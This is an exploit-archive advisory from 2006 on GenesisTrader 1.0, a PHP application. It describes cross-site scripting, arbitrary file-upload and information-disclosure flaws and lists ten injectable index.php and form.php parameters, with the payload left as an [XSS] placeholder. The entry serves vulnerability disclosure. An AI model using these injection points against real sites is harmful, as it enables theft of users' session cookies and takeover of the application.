GenesisTrader 1.0 - form.php Multiple Cross-Site Scripting Vulnerabilities

2006-12-14T00:00:00
ID EXPLOITPACK:C887FABFED0A4E3557FB35DDA1820660
Type exploitpack
Reporter Mr_KaLiMaN
Modified 2006-12-14T00:00:00

Description

GenesisTrader 1.0 - form.php Multiple Cross-Site Scripting Vulnerabilities

                                        
                                            source: https://www.securityfocus.com/bid/21595/info
 
GenesisTrader is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include multiple information-disclosure vulnerabilities, an arbitrary file-upload vulnerability, and multiple cross-site scripting vulnerabilities.
 
An attacker can exploit these issues to upload and execute malicious PHP code in the context of the webserver process, to view sensitive information, and to steal cookie-based authentication credentials. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. Exploiting these issues may aid the attacker in further attacks.
 
Version 1.0 is vulnerable to these issues; other versions may also be affected.

http://www.example.com/index.php?cuve=[XSS]
http://www.example.com/form.php?floap=ajoutfich&cuve=[XSS]
http://www.example.com/form.php?floap=modfich&chem=[XSS]
http://www.example.com/form.php?floap=modfich&do=[XSS]
http://www.example.com/form.php?floap=rename&chem=[XSS]
http://www.example.com/form.php?floap=rename&do=[XSS]
http://www.example.com/form.php?floap=copy&chem=[XSS]
http://www.example.com/form.php?floap=copy&do=[XSS]
http://www.example.com/form.php?floap=chmod&chem=[XSS]
http://www.example.com/form.php?floap=chmod&do=[XSS]